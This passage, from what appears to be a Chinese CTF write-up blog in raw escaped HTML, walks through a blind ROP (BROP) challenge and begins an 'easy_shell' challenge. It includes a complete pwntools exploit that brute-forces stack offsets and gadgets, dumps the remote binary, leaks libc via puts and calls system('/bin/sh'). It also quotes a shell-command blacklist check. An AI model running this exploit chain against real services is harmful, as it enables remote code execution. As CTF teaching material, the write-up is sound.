src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-695\"  sizes=\"auto, (max-width: 903px) 100vw, 903px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0b\u4e00\u6b65\uff0cpop_rdi\u5730\u5740\u6709\u4e86\uff0cputs\u5730\u5740\u4e5f\u6709\u4e86\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u628a\u7a0b\u5e8f\u4e00\u6bb5\u6bb5\u7684\u6253\u5370\u51fa\u6765\uff0c\u7ec4\u5408\u6210\u4e00\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6<\/p>\n\n\n\n<p>\u6211\u4eec\u9009\u53d6\u7684\u6bb5\u662f0x400000-0x401000\uff0c\u56e0\u4e3aplt\u6bb5\u548ctext\u6bb5\u90fd\u662f\u5728\u8fd9\u4e2a\u6bb5\u91cc\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-40-1024x399.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"399\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-40-1024x399.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-694\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>dump_file\u51fd\u6570\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def dump_file(buffer_size, gadget_addr, puts_addr, start_addr, end_addr):<br>    result = b\"\"<br>    while start_addr &lt; end_addr:<br>        payload = b'a' * buffer_size<br>        payload += p64(gadget_addr + 9) + p64(start_addr)<br>        payload += p64(puts_addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            data = io.recv(timeout=0.2)<br>            io.close()<br>            try:<br>                log.info(\"%x --&gt; %s\" % (start_addr,data))<br>                if data == b\"\\n\":<br>                    result += b\"\\x00\"<br>                    start_addr += 1 <br>                    continue<br>                result += data&#91;:-1]<br>                start_addr += len(data&#91;:-1])<br>            except:<br>                result += b\"\\x00\"<br>                start_addr += 1 <br>        except:<br>            io.close()<br>            result += b\"\\x00\"<br>            start_addr += 1 <br>    with open('dump.bin', 'wb') as f:<br>        f.write(result)<br>        
f.close()<\/code><\/pre>\n\n\n\n<p>\u6700\u7ec8\u4fdd\u5b58\u4e3adump.bin\uff0c\u5230\u6b64\uff0c\u5c31\u53ef\u4ee5\u5f00\u59cb\u6b63\u5e38\u89e3\u9898\u6b65\u9aa4\u4e86\uff0c\u5c06dump.bin\u62d6\u5165ida\u5206\u6790<\/p>\n\n\n\n<p>\u867d\u7136\u6211\u4eec\u6ca1\u6709\u628agot\u6bb5dump\u4e0b\u6765\uff0c\u4f46\u662fplt\u6bb5\u4e2d\u5b58\u5728\u7684\u504f\u79fbida\u80fd\u81ea\u52a8\u89e3\u6790\uff0c\u56e0\u6b64\u6ca1\u5fc5\u8981\u628agot\u6bb5\u4e5fdump\u4e0b\u6765<\/p>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u662fstart\u51fd\u6570\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u5373\u4e3amain\u51fd\u6570\uff0c\u53ea\u662f\u7f3a\u5c11\u4e86\u7b26\u53f7\u8868\u800c\u5df2\uff0c\u5bf9\u4e8e\u6f0f\u6d1e\u5206\u6790\u5b8c\u5168\u4e0d\u662f\u95ee\u9898<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-39-1024x616.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"616\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-39-1024x616.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-693\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-38.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"300\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-38.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-692\"  sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u4e2a\u51fd\u6570\u5c31\u662f\u4e00\u4e2a\u5f88\u660e\u663e\u7684\u6ea2\u51fa\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-37.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"648\" height=\"204\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-691\"  sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u5c31\u662fret2libc\u4e86\uff0c\u6cc4\u9732puts\u5730\u5740<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-36.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"918\" height=\"177\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-36.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-690\"  sizes=\"auto, (max-width: 918px) 100vw, 918px\" \/><\/div><\/figure>\n\n\n\n<p>\u5230<a href=\"https:\/\/libc.blukat.me\/\">libc database search<\/a>\u5bfb\u627e\u5bf9\u5e94\u7684libc\u6587\u4ef6\uff0c\u5982\u679c\u65e0\u6cd5\u786e\u5b9a\u662f\u54ea\u4e2a\u7684\u8bdd\uff0c\u53ef\u4ee5\u591a\u6cc4\u9732\u51e0\u4e2a\u51fd\u6570\u7684\u5730\u5740\uff0c\u6bd4\u5982read\uff0c\u7136\u540e\u6dfb\u52a0\u6761\u4ef6\u5373\u53ef\uff0c\u6709\u7ecf\u9a8c\u7684\u8bdd\u5c31\u77e5\u9053\uff0c\u7248\u672c\u662f2.23-0ubuntu11.2_amd64\u62162.23-0ubuntu11.3_amd64,\u56e0\u4e3a\u5176\u4ed6\u7684\u51e0\u4e2a\u7248\u672c\u90fd\u592a\u8001\u4e86ctf\u6bd4\u8d5b\u4e2d\u51e0\u4e4e\u9047\u4e0d\u5230\uff0c\u7136\u540e\u5c31\u628a\u8fd9\u4e24\u4e2a\u6587\u4ef6\u4e0b\u8f7d\u4e0b\u6765\u4f5c\u4e3alibc\u6587\u4ef6\uff0c\u6328\u4e2a\u8bd5\uff0c\u770b\u54ea\u4e2a\u80fd\u6253\u901a\u5c31\u53ef\u4ee5\u4e86\uff0c\u6700\u7ec8\u7248\u672c\u662f2.23-0ubuntu11.3_amd64<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-35-1024x394.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"394\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-35-1024x394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-689\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.arch = 'amd64'<br>libc=ELF(\".\/glibc-all-in-one\/libs\/2.23-0ubuntu11.3_amd64\/libc-2.23.so\", checksec = False)<br><br>def get_io():<br>    io = remote('ctf.ctbu.edu.cn',33626)<br>    # io = process(\".\/brop\")<br>    io.recvuntil(b'You can tell me something here: \\n')<br>    return io<br><br>def get_buffer_size():<br>    for i in range(1,300):<br>        payload = b'a'*i<br>        buffer_size = len(payload)<br>        try:<br>            io = get_io()<br>            io.send(payload)<br>            io.recvuntil(b'Okay, bye!')<br>            io.close()<br>            log.info(\"bad: %d\" % buffer_size)<br>        except :<br>            io.close()<br>            log.info(\"buffer_size: %d\" % (buffer_size-1))<br>            return buffer_size-1<br>        <br>def get_stop_addr(buffer_size):<br>    addr = 0x400500<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' 
in response:<br>                io.close()<br>                log.info(\"stop address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<br><br>def get_gadgets_addr(stop_addr, buffer_size):<br>    addr = 0x4006d0<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr) + p64(1)*6<br>        try:<br>            io = get_io()<br>            io.sendline(payload + p64(stop_addr))<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' in response:<br>                io.close()<br>                log.info(\"gadgets address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<br><br>def get_puts_call_addr(buffer_size, gadget_addr):<br>    addr = 0x4006c4<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size <br>        payload += p64(gadget_addr + 9) + p64(0x400000)<br>        payload += p64(addr)<br>        try:<br>            p = get_io()<br>            p.sendline(payload)<br>            p.recvuntil(b'\\x7fELF')<br>            log.info(\"puts address: 0x%x\" % addr)<br>            p.close()<br>            return addr<br>        except:<br>            p.close()<br>            log.info(\"bad: 0x%x\" % addr)<br><br>def dump_file(buffer_size, gadget_addr, puts_addr, start_addr, end_addr):<br>    result = b\"\"<br>    while start_addr &lt; end_addr:<br>        payload = 
b'a' * buffer_size<br>        payload += p64(gadget_addr + 9) + p64(start_addr)<br>        payload += p64(puts_addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            data = io.recv(timeout=0.2)<br>            io.close()<br>            try:<br>                log.info(\"%x --&gt; %s\" % (start_addr,data))<br>                if data == b\"\\n\":<br>                    result += b\"\\x00\"<br>                    start_addr += 1 <br>                    continue<br>                result += data&#91;:-1]<br>                start_addr += len(data&#91;:-1])<br>            except:<br>                result += b\"\\x00\"<br>                start_addr += 1 <br>        except:<br>            io.close()<br>            result += b\"\\x00\"<br>            start_addr += 1 <br>    with open('dump.bin', 'wb') as f:<br>        f.write(result)<br>        f.close()<br><br>def exp():<br><br>    # get_buffer_size()                               # 136<br>    # get_stop_addr(136)                              # 0x4006c4<br>    # get_gadgets_addr(0x4006c4,136)                  # 0x40075a + 9<br>    # get_puts_call_addr(136,0x40075a)                # 0x4006c9<br>    # dump_file(136,0x40075a,0x4006c9,0x400000,0x401000)<br><br>    io = get_io()<br>    buffer_size = 136<br>    pop_rdi = 0x40075a + 9<br>    ret = pop_rdi + 1<br>    puts_plt = 0x400520<br>    puts_got = 0x601018<br>    pd = b'a' * buffer_size<br>    pd += p64(pop_rdi) + p64(puts_got)<br>    pd += p64(puts_plt)<br>    pd += p64(0x4006D5)<br>    io.sendline(pd)<br>    puts_addr = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>    log.info(\"puts_addr: %x\" % puts_addr)<br><br>    libc_base = puts_addr - libc.symbols&#91;b'puts']<br>    log.info(\"libc_base: %x\" % libc_base)<br>    libc_system = libc_base + libc.symbols&#91;b'system']<br>    bin_sh_addr = libc_base + next(libc.search(b'\/bin\/sh'))<br><br>    pd = b'a'*136 + p64(ret) + p64(pop_rdi) + p64(bin_sh_addr) + 
p64(libc_system)<br>    io.sendline(pd)<br>    <br>    io.interactive() <br><br>if __name__=='__main__':<br>    exp()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">okabe\u7cfb\u5217\u9898\u76ee\uff1a<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">easy_shell<\/h3>\n\n\n\n<p>\u8003\u70b9\uff1a $0\u5728\u90e8\u5206\u60c5\u51b5\u4e0b\u53ef\u4ee5\u83b7\u5f97\u7c7b\u4f3c\/bin\/sh\u7684\u6548\u679c\uff0c\u53e6\u5916\u5c31\u662fsh\u548c\/bin\/sh\u7b49\u4ef7<\/p>\n\n\n\n<p>\u8fdb\/shell\u540e\uff0c\u539f\u610f\u56fe\u662f\u8003\u5bdf\u62fc\u63a5\u6307\u4ee4\u7ed5\u8fc7<\/p>\n\n\n\n<p>\u9009\u624b\u89c6\u89d2\uff1a<\/p>\n\n\n\n<p>IDA\u6253\u5f00\u9644\u4ef6\uff0c\u770b\u5230\u6846\u4f4f\u7684\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-33-1024x649.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"649\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-33-1024x649.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-687\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u7531\u4e8e\u51fa\u9898\u4eba\u5bf9\u4e8e\u51fa\u9898\u6d41\u7a0b\u7684\u4e0d\u719f\u6089\uff0c\u6240\u4ee5\u9009\u62e9\u9759\u6001\u7f16\u8bd1\u7684\u539f\u56e0\uff0c\u770b\u8d77\u6765\u53ef\u80fd\u5f88\u96be\u53bb\u7406\u89e3\u5b83\u662f\u600e\u4e48\u5224\u65ad\u7684\uff08\u8fd9\u91cc\u7ed9\u5404\u4f4d\u65b0\u751f\u78d5\u4e00\u4e2a\uff09<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\u4e5f\u53ef\u4ee5\u53bb\u5927\u81f4\u731c\u4e00\u731c\uff0cstrcmp\u8fd8\u662f\u5f88\u5e38\u89c1\u7684\uff0c\u6211\u4eec\u770b\u770b\u5b83\u5728\u641c\u7d22\u5f15\u64ce\u91cc\u7684\u89e3\u91ca\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-34.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"541\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-34.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-688\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<p>\u5b83\u8bf4strcmp\u662f\u5728\u5bf9\u4e24\u4e2a\u5b57\u7b26\u4e32\u5185\u5bb9\u8fdb\u884c\u6bd4\u8f83\uff0c\u90a3\u4e48\u56de\u5230\u7ea2\u6846\u5185\u5bb9\uff0c\u5230\u5e95\u662f\u4ec0\u4e48\u5728\u548c\u4ec0\u4e48\u6bd4\u8f83\uff1f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  if ( (unsigned int)j_strcmp_ifunc(v10, \"$0\")<br>    &amp;&amp; (unsigned int)j_strcmp_ifunc(v10, \"sh\")<br>    &amp;&amp; (unsigned int)j_strcmp_ifunc(v10, \"\/sh\") 
)<\/code><\/pre>\n\n\n\n<p>\u5927\u6982\u770b\u770b\u5c31\u77e5\u9053\uff0c\u662fv10\u5728\u548c&#8221;$0&#8243;&#8221;sh&#8221;&#8221;\/sh&#8221;\u8fdb\u884c\u6bd4\u8f83<\/p>\n\n\n\n<p>v10\u53c8\u662f\u4ec0\u4e48\u5462\uff1f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  if ( !fgets(v10, 100LL, stdin) )<br>    return 1;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\uff0c\u8fdb\u884c\u4e86fgets\uff0c\u5b83\u63a5\u53d7\u5230\u7684\u5185\u5bb9\uff0c\u5c31\u4f1a\u88ab\u5b58\u5230v10\u8fd9\u4e2a\u5b57\u7b26\u6570\u7ec4\u4e2d<\/p>\n\n\n\n<p>\u6bd4\u8f83\u5bf9\u4e86\uff0c\u5c31\u80fd\u8fdb\u4e00\u6b65\u5f80\u4e0b\u8d70<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u8fdb\u5165<code>filtered_shell()<\/code>\u51fd\u6570<\/p>\n\n\n\n<p>\u7136\u540e\u8f93\u51fa\u63d0\u793a\u4fe1\u606f<\/p>\n\n\n\n<p>\u5c31\u7b97\uff0c\u4f60\u6ca1\u60f3\u8fc7\u641cstrcmp\u662f\u600e\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<p>\u4e5f\u6ca1\u770b\u61c2\u903b\u8f91\u662f\u4ec0\u4e48\u60c5\u51b5<\/p>\n\n\n\n<p>\u90a3\u4f60\u770b\u5230\u5b83\u4e13\u95e8\u63d0\u51fa\u4e86&#8221;$0&#8243;&#8221;sh&#8221;&#8221;\/sh&#8221;<\/p>\n\n\n\n<p>\u5c31\u8f93\u5165\u8bd5\u8bd5\u770b\u561b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u7ed3\u679c\u5c31\u662f\uff1a\nEnter your command: sh\nPrivileges elevated! Starting restricted shell...\nRestricted shell. 
ls is allowed, but some commands are blocked.\nTry to get the flag, but remember: direct access is blocked!\n$<\/code><\/pre>\n\n\n\n<p>\u4f60\u770b\uff0c\u8fdb\u540e\u9762\u7684<code>filtered_shell()<\/code>\u51fd\u6570\u4e86\u5427<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u73b0\u5728\u5462\uff0c\u6211\u4eec\u5728IDA\u91cc\u53cc\u51fb\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n<p>\u8ddf\u8fdb\u8fd9\u4e2a\u51fd\u6570\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-31-1024x523.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"523\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-31-1024x523.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-685\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u786e\u5b9e\u5f88\u957f\u5f88\u6076\u5fc3\u5f88\u96be\u770b\u660e\u767d\u662f\u600e\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<p>\u4f46\u662f<\/p>\n\n\n\n<p>\u7ea2\u6846\u8fd9\u91cc\u7684\u5224\u65ad\u903b\u8f91\u8fd8\u662f\u5f88\u597d\u8ba4\u7684\u5427<\/p>\n\n\n\n<p>\u8fd9\u91cc\u4f1a\u628av8\u8fdb\u884c<code>is_forbidden<\/code>\u64cd\u4f5c<\/p>\n\n\n\n<p>\u597d\uff0c\u90a3\u4e48\u6211\u4eec\u7ee7\u7eed\u8ddf\u8fdb<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-32.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"651\" height=\"526\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-32.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-686\"  sizes=\"auto, (max-width: 651px) 100vw, 651px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u662f\u8fd9\u4e2a\u7a0b\u5e8f\u7b2c\u4e8c\u5173\u7684\u5224\u65ad\u9ed1\u540d\u5355\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u4f60\u8f93\u5165\u8fd9\u91cc\u7684\u4efb\u4f55\u4e00\u4e2a\u5185\u5bb9\u90fd\u662f\u4e0d\u88ab\u5141\u8bb8\u7684<\/p>\n\n\n\n<p>\u5176\u4e2d\uff0c\u5f88\u591a\u4eba\u60ef\u7528\u7684cat\u597d\u50cf\u6ca1\u88ab\u7981\u7528\uff0c\u4e3a\u4ec0\u4e48\u4ea4\u4e92\u91cc\u8fd8\u662f\u4e0d\u80fd\u7528\u5462\uff1f<\/p>\n\n\n\n<p>\u6b38\uff0c\u8fd9\u91cc\u4f60\u8ddf\u8fdb<code>unk_482010<\/code>\u770b\u770b\u5462<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-30-1024x59.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"59\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-30-1024x59.png\" 
